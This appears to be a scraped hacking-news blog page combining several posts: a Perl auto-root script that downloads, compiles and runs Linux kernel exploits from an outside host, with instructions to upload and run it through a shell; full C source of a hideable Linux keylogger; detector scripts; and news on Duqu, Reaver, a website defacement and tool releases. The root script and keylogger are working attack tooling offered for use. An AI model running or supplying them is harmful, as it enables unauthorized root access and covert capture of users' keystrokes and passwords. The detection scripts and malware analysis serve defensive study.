
Shak-Attack.pl V.1 ( Auto R00t for Almost all Linux Latest Version ) By PCA


Shak-Attack.pl V.1 is a Linux root exploit script written in Perl by Shak of the Pakistan Cyber Army (PCA).
According to Shak:-

"...I found this useful in hacking , so i released my first auto root Perl exploit ,
i name this to Shak-attack.pl

Usage :-

save the below code in text document , and then save as to shak-attack.pl

upload it through shell , change the permission to 777 , and run it by using this command

perl shak-attack.pl

i have added some new Linux local root in it , will release the v2.0 version s00n ,
as I am working on other new Linux exploits , will add them as well ,

and also will add some other tools in this script !

this is a public version ! feel free to use it , if you have any error , let me know !

regards ,

<=Shak=>........"

Shak-Attack.pl V.1 Code:-

#!/usr/bin/perl
############################################
#shak-attack.pl coded by <=Shak=>          #
#Site: http://pakcyberarmy.net/
#Contact : hax_you_anytime@live.com
#Thankx to : z3r0 c0de , Shadow008         #
############################################

if ($ARGV[0] =~ "root" )
{
system("wget http://pakcyberarmy.com/local/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://pakcyberarmy.com/local/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");

}
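
For defenders, the pattern the script follows (fetch a .c file, compile it in place, run the result) stands out in process-execution logs. The detector below is an added example, not part of the original post: the log format, the host files.example.invalid and the 300-second window are assumptions, and the sample lines are constructed.

```python
import os
import shlex

# Constructed sample: "epoch uid cwd command..." (format is an assumption,
# e.g. flattened from auditd execve records). uid 33 is www-data on Debian.
SAMPLE_LOG = """\
1700000000 33 /var/www/uploads perl shak-attack.pl root
1700000001 33 /var/www/uploads wget http://files.example.invalid/local/2.6.18.c
1700000003 33 /var/www/uploads gcc 2.6.18.c -o 2.6.18
1700000004 33 /var/www/uploads chmod 777 2.6.18
1700000005 33 /var/www/uploads ./2.6.18
1700000006 33 /var/www/uploads id
1700000007 33 /var/www/uploads wget http://files.example.invalid/local/2.6.34.c
1700000009 33 /var/www/uploads gcc -w 2.6.34.c -o 2.6.34
1700000010 33 /var/www/uploads sudo setcap cap_sys_admin+ep 2.6.34
1700000011 33 /var/www/uploads ./2.6.34
1700000500 1000 /home/dev/proj gcc main.c -o main
1700000501 1000 /home/dev/proj ./main
"""

FETCHERS = {"wget", "curl"}
COMPILERS = {"gcc", "cc", "clang"}
WINDOW = 300  # seconds allowed between fetch, build and run (assumed threshold)


def detect(log_text, window=WINDOW):
    """Return findings for fetch -> compile -> execute chains per (uid, cwd)."""
    fetched = {}  # (uid, cwd, source file) -> time fetched
    built = {}    # (uid, cwd, binary)      -> (source file, time built)
    findings = []
    for line in log_text.splitlines():
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue
        ts, uid, cwd = int(parts[0]), int(parts[1]), parts[2]
        try:
            argv = shlex.split(parts[3])
        except ValueError:  # unbalanced quotes in the logged command
            argv = parts[3].split()
        if argv and argv[0] == "sudo":
            argv = argv[1:]
        if not argv:
            continue
        prog = os.path.basename(argv[0])

        if prog in FETCHERS:
            # Remember C sources pulled from a URL into this directory.
            for arg in argv[1:]:
                if "://" in arg and arg.endswith(".c"):
                    fetched[(uid, cwd, arg.rsplit("/", 1)[1])] = ts
        elif prog in COMPILERS:
            out = "a.out"
            if "-o" in argv[:-1]:
                out = argv[argv.index("-o") + 1]
            # Only builds of recently fetched sources are interesting.
            for arg in argv[1:]:
                t0 = fetched.get((uid, cwd, arg))
                if t0 is not None and ts - t0 <= window:
                    built[(uid, cwd, out)] = (arg, ts)
        elif prog == "setcap" and (uid, cwd, argv[-1]) in built:
            findings.append({"ts": ts, "uid": uid, "cwd": cwd,
                             "rule": "setcap-on-fresh-binary",
                             "binary": argv[-1]})
        elif argv[0].startswith("./"):
            hit = built.get((uid, cwd, argv[0][2:]))
            if hit and ts - hit[1] <= window:
                findings.append({"ts": ts, "uid": uid, "cwd": cwd,
                                 "rule": "fetch-compile-execute",
                                 "binary": argv[0][2:], "source": hit[0]})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The developer's own build at the end of the sample is not flagged, because main.c was never fetched from a URL.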


Duqu Mystery Finally Solved By Researcher at Kaspersky Lab


After much drama, the deep mystery of Duqu has finally been solved. Researchers at Kaspersky Lab have found that this dangerous Stuxnet-like malware was written in a custom object-oriented C dialect called “OO C”. The mystery began earlier this month, when Kaspersky researchers struggled to determine what programming language had been used to develop Duqu. So the researchers asked the programming community for help in finding out the truth. They got a huge response: 200 comments and 60+ e-mail messages with suggestions about possible languages and frameworks that could have been used to generate the Duqu Framework code.
Let us review the most popular suggestions:-
  • Variants of LISP
  • Forth
  • Erlang
  • Google Go
  • Delphi
  • OO C
  • Old compilers for C++ and other languages
There are two main possibilities. The code was either written using a custom OO C framework, or it was entirely written in OO C manually, without any language extensions. No matter which of these two variants is true, the implications are impressive. The Payload DLL contains 95 Kbytes of event-driven code written with OO C, a language that has no automatic memory management or safe pointers, Kaspersky’s Igor Soumenkov pointed out. “This kind of programming is more commonly found in complex ‘civil’ software projects, rather than contemporary malware. Additionally, the whole event-driven architecture must have been developed as a part of the Duqu code or its OOC extension,” said Soumenkov.
This led to the assumption that the developers are old school and don’t trust C++, which is why they relied on C. Another reason for using OO C is that back in the good old days it was more portable than C++. Duqu was created by a professional team that wrote the framework based on old code.



Reaver 1.4- Wifi Protected Setup (WPS) Brute Forcer Released

We discussed a tool named Reaver earlier. After Stefan Viehböck, an Austrian information security student and researcher, released details of a vulnerability in the WiFi Protected Setup (WPS) standard that enables attackers to recover the router PIN, a security firm published an open-source tool capable of exploiting the vulnerability. The tool, known as Reaver, can find the WPS PIN on a given router and then recover the WPA passphrase for the router as well. Now we have the next version, Reaver 1.4.
List Of Changes In Reaver 1.4:-
  1. Updated reaver and wash usage, reverted last wash update (unnecessary).
  2. Wash now processes data even if received on the wrong channel.
  3. Added BSSID to session restore prompt.
  4. Fixed wash pcap parsing bug.
  5. Updated exchange.c to timeout properly if --no-nacks is specified.
  6. Added --no-nacks option for APs that repeatedly send multiple WPS response packets.
  7. Added --exec option to run a specified command upon successful completion.
  8. Fixed --session bug.
  9. Added RSSI output to wash.
  10. Fixed makefile bug.
  11. Fixed bug in pins.c introduced in r95. Pins no longer randomized.
  12. Added sanity checks for out of order packets to message processing in exchange.c
  13. Fixed null pointer reference bug.
  14. Reverted association supported and extended rates to original values.
  15. Re-work of the message processing functions, primarily in exchange.c
  16. Added -p option to mkdir in makefile.
  17. Added sanity checks to ensure that WPS messages are sent in the proper order.
  18. Fixed arg parsing bug.
  19. Updated Makefile, changed ‘walsh’ to ‘wash’. Added wash documentation.
  20. Fixed bug in auto-detection of WSC_NACK support.
  21. Fixed channel hopping bug. Now WSC_NACKs are always sent to ensure WPS session termination.
  22. Supported rates in association packets now reflect the supported rates in the AP’s beacon packets. AP beacons are now always parsed prior to reassociation to ensure we are still on the right channel.
  23. Fixed database permissions bug in Reaver Makefile
  24. Fixed walsh channel bug. Added sanity checks in exchange.c before setting progress status to KEY2_DONE.
  25. Fixed overflow in parse_beacon_tags.
  26. Fixed logic bug where SEND_M2D status was interpreted as a RECV_DONE status.
  27. Fixed memory leaks.
  28. Fixed bug in generating proper WPS messages (resulted in false negatives). Added verbose message status output.
  29. wpsmon char c => int c.
  30. Documentation updates.
  31. Fixed Makefile bug.
  32. Fixed session saved output bug.
  33. Updated session.c to always print restore session prompt to stderr.
  34. Updated Makefile, configure script and #defines to ensure that --prefix is honored.
  35. Fixed makefile not properly installing to specified prefix.
  36. Removed dev debug flag
  37. Enabled debug output for troubleshooting issues; don’t use unless you want lots of debug output (this will be made a command line option in the near future…)
  38. Updated walsh WPS lock status display. Fixed file permission bug in Makefile. Removed old code in libwps/.
  39. Updated walsh to display more useful info. Removed adaptive delay feature.
  40. Added adaptive lockout sleep times, added -ldl to LDFLAGS





Official Website of Senator Vicente C. Sotto III Hacked By Anonymous Philippines


The Philippines rampage of the hacktivist collective Anonymous continues: the group has struck again and hit the official website of Senator Vicente C. Sotto III. The attack was carried out under the banner of 'OccupyPhilippines'; the hacker group broke into the server of Senator Tito Sotto and defaced the index page. According to the hacker, the cyber attack was a stand against the controversial "Cybercrime Prevention Act of Philippines", widely known as Republic Act No. 10175. The hacker group believes that if this bill is not revised, freedom of speech in cyberspace will be restricted. During the attack the hacker left this message for the Senator:

"It's been a long time, Tito Sen! Deny us our freedom of speech and of expression through R.A. 10175 
and we will deny you your cyberspace. You cannot shut us up, you cannot shut us down. 
And you shall not see us rest until R.A. 10175 is revised.
We are all waiting, we are all ready.
We are Anonymous, we are legion.
We do not forgive and we do not forget.
Expect Us
Protect our Right to Freedom of Expression!..."

The attack took place yesterday evening. As soon as the intrusion was spotted, the site was taken offline for a period. This morning the site was restored and returned to its normal state.





Analysis of an Osama bin Laden RTF Exploit

Targeted/semi-targeted attacks have been utilizing exploits against Microsoft's "RTF Stack Buffer Overflow Vulnerability" (CVE-2010-3333) since last December. The vulnerability was patched last November in security bulletin MS10-087.
Many of the attacks we've seen which exploit CVE-2010-3333 have used topical subject lines.
And this week is no different. So of course, there's an Osama bin Laden RTF exploit circulating in the wild which uses the subject: "FW: Courier who led U.S. to Osama bin Laden's hideout identified".
The file is named "Laden's Death.doc".


When the RTF file is opened, the exploit executes shellcode and drops a file named server.exe inside C:/RECYCLER and executes it.

C:/RECYCLER/server.exe does the following:

  •  Drops a file in the system's temp folder: vmm2.tmp
  •  File vmm2.tmp is renamed and moved to c:\windows\system32\dhcpsrv.dll
  •  Makes registry modifications in an attempt to hijack the DHCP service.

It attempts to connect to a C&C hosted at ucparlnet.com.

The payload has the ability to:

  •  Download additional malware
  •  Connect and send sensitive data back to remote servers
  •  Act as a trojan proxy server

The folks at contagio malware dump report that "It was sent to many targets in the US Government today".

Checking our back end shows that some of our customers have also been exposed. Our detection name for the exploit is Exploit:W32/Cve-2010-3333.G and the RTF payload is detected as Trojan:W32/Agent.DSKA.

As always, the usual advice applies: exercise caution when opening attachments, patch/update your MS Word/Office, and make sure your antivirus is up to date.

You can see more examples of CVE-2010-3333 attacks at contagio.

Updated to add: Here's a picture of an email spreading this document. This was sent to analysts in Washington, D.C. The picture was published by Lotta Danielsson-Murphy. Do note that the sender information in the email is forged.
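
The indicators listed in this write-up can be checked against endpoint and DNS telemetry. The triage script below is an added example, not part of the original analysis: the event format, host names, temp directory, registry key and verdict thresholds are assumptions, and the sample events are constructed.

```python
import re

# Indicators named in the write-up above.
DROPPER = r"c:\recycler\server.exe"
TEMP_NAME = "vmm2.tmp"
SERVICE_DLL = r"c:\windows\system32\dhcpsrv.dll"
C2_DOMAIN = "ucparlnet.com"
STAGES = ("dropper", "temp_file", "service_dll", "registry", "c2_dns")

# Constructed sample events: host|event type|value. The hosts, the temp
# directory and the registry key are made up; the post does not name the key.
SAMPLE_EVENTS = r"""
ws-014|file_create|C:/RECYCLER/server.exe
ws-014|file_create|C:\DOCUME~1\analyst\LOCALS~1\Temp\vmm2.tmp
ws-014|file_create|C:\WINDOWS\system32\dhcpsrv.dll
ws-014|reg_set|HKLM\EXAMPLE\PlaceholderKey=C:\WINDOWS\system32\dhcpsrv.dll
ws-014|dns_query|www.ucparlnet.com.
ws-022|file_create|C:\WINDOWS\system32\dhcpcsvc.dll
ws-022|dns_query|notucparlnet.com
ws-031|dns_query|UCPARLNET.COM
"""


def norm_path(path):
    """Lower-case and unify separators so C:/RECYCLER and c:\\recycler match."""
    return re.sub(r"[\\/]+", r"\\", path.strip().strip('"')).lower()


def classify(kind, value):
    """Map one event to a stage of the chain described in the post, or None."""
    if kind == "file_create":
        path = norm_path(value)
        if path == DROPPER:
            return "dropper"
        if path.rsplit("\\", 1)[-1] == TEMP_NAME:
            return "temp_file"
        if path == SERVICE_DLL:
            return "service_dll"
    elif kind == "reg_set":
        # Any registry value whose data points at the dropped DLL.
        _key, _, data = value.partition("=")
        if norm_path(data).endswith("\\dhcpsrv.dll"):
            return "registry"
    elif kind == "dns_query":
        # Match the domain and its subdomains, not look-alike suffixes.
        name = value.strip().rstrip(".").lower()
        if name == C2_DOMAIN or name.endswith("." + C2_DOMAIN):
            return "c2_dns"
    return None


def triage(events_text):
    """Return {host: {"stages": [...], "verdict": str}} for hosts with hits."""
    seen = {}
    for line in events_text.splitlines():
        parts = line.strip().split("|", 2)
        if len(parts) != 3:
            continue
        host, kind, value = parts
        stage = classify(kind, value)
        if stage:
            seen.setdefault(host, set()).add(stage)
    result = {}
    for host, stages in seen.items():
        host_side = stages - {"c2_dns"}
        if len(host_side) >= 2:      # assumed threshold
            verdict = "likely compromised"
        elif host_side:
            verdict = "investigate"
        else:
            verdict = "dns only"
        result[host] = {"stages": [s for s in STAGES if s in stages],
                        "verdict": verdict}
    return result


if __name__ == "__main__":
    for host, info in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, info)
```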


NUXKEYLOGGER VERSION 1.3 (Key Logger For LINUX)


NUXKEYLOGGER VERSION 1.3  is an effective Key Logger For LINUX systems. 

Brief Description:- 
Nux Keylogger monitors keyboard activity on a Linux system.  It's possible to hide and daemonize this process and it supports azerty and qwerty keyboard modes.

Author:- Vilmain Nicolas (C) 2010, 2011 (null.sim@gmail.com)

Licence:-


This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.


Source Code of Nuxkeylogger Version 1.3:-

#include  <fcntl.h>
#include  <errno.h>
#include  <stdio.h>
#include  <unistd.h>
#include  <getopt.h>
#include  <stdlib.h>
#include  <string.h>
#include  <signal.h>
#include  <dirent.h>
#include  <sys/select.h>
#include  <linux/input.h>

#define DF_PATH_LOG             "/tmp/.Xsys"
#define PATH_KEYBOARD_FILE      "/dev/input/by-path/"
#define VERSION_STR             "nuxkeylogger version 1.3"
#define PATH_LEN                1024

#define  SIZE_TAB_KEY_AZERTY   sizeof (tab_key_azerty)
#define  SIZE_TAB_KEY_QWERTY   sizeof (tab_key_qwerty)

struct fdlist_s
  {
    int *fdtab;
    int n;
    int *p_lastfd;
    int fdlog;
  };

void    checkuid (void);
void    decode_nuxkeylogger_options (int argc, char **argv, char **pathlog);
void    version (void);
void    usage (void);
void    out_memory (const char *type);
char *  xstrdup (const char *str);
void    hide (int argc, char **argv, const char *name);
void    block_signal (void);
void    daemonize (void);
int     get_keyboard_fd (struct fdlist_s *fl);
int     open_fd_log (char *pathlog, int *fd);
void    loop_keyboard_key (struct fdlist_s *fl);
int     write_key (int fd, int fdlog);
void    free_fdlist (struct fdlist_s *fl);

static const char *tab_key_azerty[] =
  {
     "<ESC>", "&", "é", "\"", "'", "(", "-", "è", "_",
     "ç", "à ", ")", "=", "<BACKSPACE>", "<TAB>", "a",
     "z", "e", "r", "t", "y", "u", "i", "o","p", "^",
     "$", "<ENTER>\n", "<CTRL>", "q", "s", "d", "f", "g", "h",
     "j", "k", "l", "m", "ù", "²", "<SHIFT>", "*", "w",
     "x", "c", "v", "b", "n", ",", ";", ":", "!", "<SHIFT>",
     "*", "<ALT>", " ", "", "<F1>", "<F2>", "<F4>",
     "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>", "",
     "<VerNum>", "", "7", "8", "9", "-", "4", "5", "6",
     "+", "1", "2", "3", "0", "<?>", "", "", "<", "<F11>",
     "<F12>", "", "", "", "", "", "", "", "", "", "/", "",
     "<ALTGr>", "", "", "<Up>", "<UP>", "<Left>", "<Right>",
     "<END>", "<Down>", "<DOWN>", "", "<DEL>", "", "", "",
     "", "", "", "", "", "", "", "", "", "", "<META>"
  };

static const char *tab_key_qwerty[] =
  {
    "<ESC>", "!", "@", "#", "$", "%", "^", "&", "*",
    "(", ")", "_", "=", "<BACKSPACE>", "<TAB>", "q",
    "w", "e", "r", "t", "y", "u", "i", "o", "p",
    "[", "]", "<ENTER>\n", "<CTRL-LEFT>", "a", "s", "d",
    "f", "g", "h", "j", "k", "l", ";", "'", "`", "",
    "\\", "z", "x", "c", "v", "b", "n", "m", ",", "",
    "", "", "", "ALT", " ", "", "<F1>", "<F2>", "<F3>",
    "<F4>", "<F5>", "<F6>", "<F7>", "<F8>", "<F9>", "<F10>",
    "", "", "7","8", "9", "-", "4", "5", "6", "+", "1", "2",
    "3", "0", ".", "", "", "<", "<F11>", "<F12>", "", "",
    "", "", "", "", "", "<ENTER-RIGHT>", "<CTRL-RIGHT>", "",
    "", "<AltGR>",  "", "", "<Up>", "", "<LEFT>", "", "<RIGHT>",
    "", "<DOWN>", "", "", "", "", "", "", "", ""
  };

char **tab_key;

int
main (int argc, char **argv)
{
  struct fdlist_s fl;
  char *pathlog = NULL;

  checkuid ();
  memset (&fl, 0, sizeof (struct fdlist_s));
  fl.fdlog = -1;
  tab_key = (char **) tab_key_azerty;
  decode_nuxkeylogger_options (argc, argv, &pathlog);
  if (get_keyboard_fd (&fl)
      || open_fd_log (pathlog, &fl.fdlog) == -1)
    {
      free_fdlist (&fl);
      return EXIT_FAILURE;
    }
  loop_keyboard_key (&fl);
  free_fdlist (&fl);
  return EXIT_SUCCESS;
}

void
checkuid (void)
{
  if (getuid ())
    {
      fprintf (stderr, "WARNING: need root!\n");
      exit (EXIT_SUCCESS);
    }
}


void
decode_nuxkeylogger_options (int argc, char **argv, char **pathlog)
{
  char   opt;
  char   *name = NULL;
  static struct option const long_options[] =
    {
      {"help",           no_argument, 0,        'h'},
      {"version",        no_argument, 0,        'v'},
      {"daemonize",      no_argument, 0,        'd'},
      {"block-signals",  no_argument, 0,        's'},
      {"mode-qwerty",    no_argument, 0,        'Q'},
      {"mode-azerty",    no_argument, 0,        'A'},
      {"hidden",         required_argument, 0,  'i'},
      {"path-log",       required_argument, 0,  'p'},
      {0,                0,                 0,   0}
    };

  do
    {
      opt = getopt_long (argc, argv, "hvdsAQi:p:", long_options, NULL);
      switch (opt)
    {
    case 'h':
      usage ();
      break;
    case 'v':
      version ();
      break;
    case 'i':
      name = argv[optind - 1];
      break;
    case 'd':
      daemonize ();
      break;
    case 's':
      block_signal ();
      break;
    case 'A':
      tab_key = (char **) tab_key_azerty;
      break;
    case 'Q':
      tab_key = (char **) tab_key_qwerty;
      break;
    case 'p':
      *pathlog = xstrdup (optarg);
      break;
    }
    }
  while (opt != -1);
  if (name)
    hide (argc, argv, name);
}

void
version (void)
{
  puts (VERSION_STR);
  exit (EXIT_SUCCESS);
}

void
usage (void)
{
  printf ("Warning, in \"qwerty\" mode, it's possibility to error key-mapp\n"
      "arguments list:\n\r"
      "   -H, --help                  print usage and exit program\n\r"
      "   -V, --version               print program_version and exit\r\n"
      "   -d, --daemonize             exec program in background\r\n"
      "   -s, --block-signal          block all signal\r\n"
      "   -Q, --mode-qwerty           keyboard in qwerty mode\r\n"
      "   -A, --mode-azerty           keyboard in azerty mode"
      "(by default)\r\n"
      "   -i, --hidden [NEW NAME]     change program name\r\n"
      "   -p, --path-log [PATH]       name for output log file\r\n");
  exit (EXIT_SUCCESS);
}

void
out_memory (const char *type)
{
  fprintf (stderr, "%s: memory exhausted\n", type);
  exit (EXIT_FAILURE);
}

char *
xstrdup (const char *str)
{
  char *copy = NULL;

  copy = strdup (str);
  if (!copy)
    out_memory ("strdup");
  return copy;
}
   
void
hide (int argc, char **argv, const char *name)
{
  char  *newname = NULL;

  newname = xstrdup (name);
  for (; argc; argc--)
    memset (argv[argc - 1], 0, strlen (argv[argc - 1]));
  strcpy (argv[0], newname);
  free (newname);
}

void
block_signal (void)
{
  int *p_sig = NULL;
  static const int sigtab[] =
    {
      SIGUSR1, SIGUSR2, SIGINT, SIGPIPE, SIGQUIT,
      SIGTERM, SIGTSTP, SIGHUP, SIGILL, SIGABRT,
      SIGFPE, SIGSEGV, SIGALRM, SIGCHLD, SIGCONT,
      SIGTTIN, SIGTTOU, 0
    };
 
  p_sig = (int *) sigtab;
  do
    signal (*p_sig, SIG_IGN);
  while (*++p_sig);
}

void
daemonize (void)
{
  pid_t pid;

  pid = fork ();
  if (pid == -1)
    {
      perror ("fork");
      exit (EXIT_FAILURE);
    }
  else if (pid)
    exit (EXIT_SUCCESS);
}

int
get_keyboard_fd (struct fdlist_s *fl)
{
  struct dirent *ent = NULL;
  DIR *dir = NULL;
  char path[PATH_LEN];

  dir = opendir (PATH_KEYBOARD_FILE);
  if (!dir)
    {
      fprintf (stderr, "opendir: %s\n", strerror (errno));
      return -1;
    }
  for (;;)
    {
      ent = readdir (dir);
      if (!ent)
    break;
      if (strstr(ent->d_name, "-kbd"))
    {
      memset (path, 0, PATH_LEN);
      snprintf (path, (PATH_LEN - 1), "%s%s",
            PATH_KEYBOARD_FILE, ent->d_name);
      fl->n++;
      fl->fdtab = realloc (fl->fdtab, (fl->n * sizeof (int)));
      fl->fdtab[fl->n - 1] = open (path, O_RDONLY);
      if (fl->fdtab[fl->n - 1] == -1)
        {
          fprintf (stderr, "open(%s): %s", path, strerror (errno));
          closedir (dir);
          return -1;
        }
    }
    }
  closedir (dir);
  fl->p_lastfd = &fl->fdtab[fl->n - 1];
  return 0;
}

int
open_fd_log (char *pathlog, int *fd)
{
  char *p_log = NULL;

  p_log = (pathlog) ? pathlog : DF_PATH_LOG;
  *fd = open (p_log, O_WRONLY | O_CREAT | O_APPEND);
  if (*fd == -1)
    fprintf (stderr, "open(%s): %s\n", p_log, strerror (errno));
  if (pathlog)
    free (pathlog);
  return *fd;
}

void
free_fdlist (struct fdlist_s *fl)
{
  int i;

  if (fl->fdtab)
    {
      for (i = 0; i < fl->n; i++)
    {
      if (fl->fdtab[i] != -1)
        close (fl->fdtab[i]);
    }
      free (fl->fdtab);
    }
  if (fl->fdlog != -1)
    close (fl->fdlog);
}

void
loop_keyboard_key (struct fdlist_s *fl)
{
  int n;
  int ret;
  fd_set setread;

  for (;;)
    {
      FD_ZERO (&setread);
      for (n = 0; n < fl->n; n++)
    FD_SET (fl->fdtab[n], &setread);
      ret = select (*fl->p_lastfd + 1, &setread, NULL, NULL, NULL);
      if (ret == -1)
    return;
      else if (ret)
    {
      for (n = 0; n < fl->n; n++)
        if (FD_ISSET (fl->fdtab[n], &setread))
          {
        if (write_key (fl->fdtab[n], fl->fdlog) == -1)
          return;
          }
    }
    }
}

int
write_key (int fd, int fdlog)
{
  struct input_event ev;
  char *key = NULL;

  if (read(fd, &ev, sizeof(struct input_event))
      == sizeof(struct input_event))
    {
      if ((ev.value == EV_KEY || ev.value == 2)
      && (ev.code - 1) > -1 && (ev.code - 1) < 118)
    {
      key = tab_key[ev.code - 1];
      if (write (fdlog, key, strlen (key)) == -1)
        return -1;
    }
    }
  return 0;
}


For Installation:- 

$ gcc -o nuxkeylogger nuxkeylogger.c -W -Wall 
# ./nuxkeylogger --help
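
The source above opens the keyboard event devices, appends to /tmp/.Xsys by default and can overwrite its own argv, which gives defenders three things to look for on a host. The check below is an added example, not part of the original post or of the nuxkeylogger project: the allowlist, the sample process names and the fake /proc tree are assumptions and constructed data.

```python
import os
import tempfile

# Assumption: site-specific allowlist of programs expected to read input devices.
ALLOWED = {"Xorg", "systemd-logind", "gnome-shell"}


def input_readers(proc_root="/proc", allowed=ALLOWED):
    """Report every process that holds a /dev/input/event* device open."""
    report = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            fds = os.listdir(os.path.join(base, "fd"))
        except OSError:  # process exited, or we lack permission (run as root)
            continue
        devices, hidden_tmp = set(), set()
        for fd in fds:
            try:
                target = os.readlink(os.path.join(base, "fd", fd))
            except OSError:
                continue
            if target.startswith("/dev/input/event"):
                devices.add(target)
            elif target.startswith("/tmp/."):
                hidden_tmp.add(target)  # dot-file such as the default /tmp/.Xsys
        if not devices:
            continue
        try:
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            exe = ""
        try:
            with open(os.path.join(base, "cmdline"), "rb") as fh:
                argv0 = fh.read().split(b"\0")[0].decode(errors="replace")
        except OSError:
            argv0 = ""
        exe_name = os.path.basename(exe.replace(" (deleted)", ""))
        report.append({
            "pid": int(entry),
            "exe": exe,
            "argv0": argv0,
            "devices": sorted(devices),
            "hidden_tmp_files": sorted(hidden_tmp),
            "allowed": exe_name in allowed,
            # argv[0] is writable by the process; rewriting it does not
            # change the exe link, so a mismatch is a hint worth a look.
            "argv0_mismatch": bool(argv0)
            and os.path.basename(argv0) != exe_name,
        })
    return sorted(report, key=lambda r: r["pid"])


def build_sample_proc(root):
    """Constructed /proc-like tree: an X server, a renamed reader, a shell."""
    sample = [
        (812, "/usr/lib/xorg/Xorg", ["/usr/lib/xorg/Xorg", ":0"],
         ["/dev/input/event3", "/dev/tty7"]),
        (4242, "/var/tmp/nuxkeylogger", ["udev-helper"],
         ["/dev/input/event3", "/tmp/.Xsys"]),
        (5000, "/bin/bash", ["bash"], ["/dev/pts/0"]),
    ]
    for pid, exe, argv, fds in sample:
        base = os.path.join(root, str(pid))
        os.makedirs(os.path.join(base, "fd"))
        os.symlink(exe, os.path.join(base, "exe"))
        with open(os.path.join(base, "cmdline"), "wb") as fh:
            fh.write(b"\0".join(a.encode() for a in argv) + b"\0")
        for n, target in enumerate(fds):
            os.symlink(target, os.path.join(base, "fd", str(n)))


def sample_report():
    """Run the check against the constructed tree instead of the live /proc."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_proc(root)
        return input_readers(root)


if __name__ == "__main__":
    for row in sample_report():
        print(row)
```

On a live system, call input_readers() as root; an argv0 mismatch alone is common among legitimate programs, so treat it as a hint alongside the other two fields.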


John the Ripper 1.7.8



John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types commonly found on Unix systems, as well as Windows LM hashes.



What is new in John the Ripper 1.7.8 :-


  • The bitslice DES S-box expressions have been replaced with those generated by Roman Rusakov specifically for John the Ripper. The corresponding assembly code for x86 with MMX, SSE2, and for x86-64 with SSE2 has been re-generated. For other CPUs and for AVX/XOP, C compilers do a reasonably good job of generating the code from the supplied C source files (with intrinsics where relevant). The S-box expressions that we were using before had a 21% larger gate count, so theoretically this could provide a 21% speedup. In practice, though, a 12% to 14% speedup at DES-based crypt(3) hashes is typical. This effort has been sponsored by Rapid7.
  • Corrected support for bcrypt (OpenBSD Blowfish) hashes of passwords containing non-ASCII characters (that is, characters with the 8th bit set). Added support for such hashes produced by crypt_blowfish up to 1.0.4, which contained a sign extension bug (inherited from older versions of John). The old buggy behavior may be enabled per-hash, using the “$2x$” prefix.
  • The external mode virtual machine’s performance has been improved through additional multi-op instructions matching common instruction sequences (assign-pop and some triple- and quad-push VM instructions were added).
  • A few minor bug fixes and enhancements were made.


This release comes with a 17% improvement in gate count for the Data Encryption Standard (DES) algorithm by generating different S-box expressions targeting both typical CPUs with only basic instructions and CPUs/GPUs that have “bit select” instructions.



Wireshark Ver 1.4.11 & 1.6.5 Released (Fixed Many Security Holes)


We have talked about Wireshark several times before. It is the world’s most popular network protocol analyzer, used for troubleshooting, analysis, development, and education. Wireshark is widely used by system admins, and also by cyber criminals, because it is capable of sniffing packets.

Official Change Log:-
Bug Fixes:-
  • wnpa-sec-2012-01: Laurent Butti discovered that Wireshark failed to properly check record sizes for many packet capture file formats. (Bug 6663, bug 6666, bug 6667, bug 6668, bug 6669, bug 6670)
  • wnpa-sec-2012-02: Wireshark could dereference a NULL pointer and crash. (Bug 6634)
  • wnpa-sec-2012-03: The RLC dissector could overflow a buffer. (Bug 6391)
  • “Closing File!” Dialog Hangs. (Bug 3046)
  • Sub-fields of data field should appear in exported PDML as children of the data field instead of as siblings to it. (Bug 3809)
  • Incorrect time differences displayed with time reference set. (Bug 5580)
  • Wrong packet type association of SNMP trap after TFTP transfer. (Bug 5727)
  • SSL/TLS decryption needs wireshark to be rebooted. (Bug 6032)
  • Export HTTP Objects -> save all crashes Wireshark. (Bug 6250)
  • Wireshark Netflow dissector complains there is no template found though the template is exported. (Bug 6325)
  • DCERPC EPM tower UUID must be interpreted always as little endian. (Bug 6368)
  • Crash if no recent files. (Bug 6549)
  • IPv6 frame containing routing header with 0 segments left calculates wrong UDP checksum. (Bug 6560)
  • IPv4 UDP/TCP Checksum incorrect if routing header present. (Bug 6561)
  • Incorrect Parsing of SCPS Capabilities Option introduced in response to bug 6194. (Bug 6562)
  • Various crashes after loading NetMon2.x capture file. (Bug 6578)
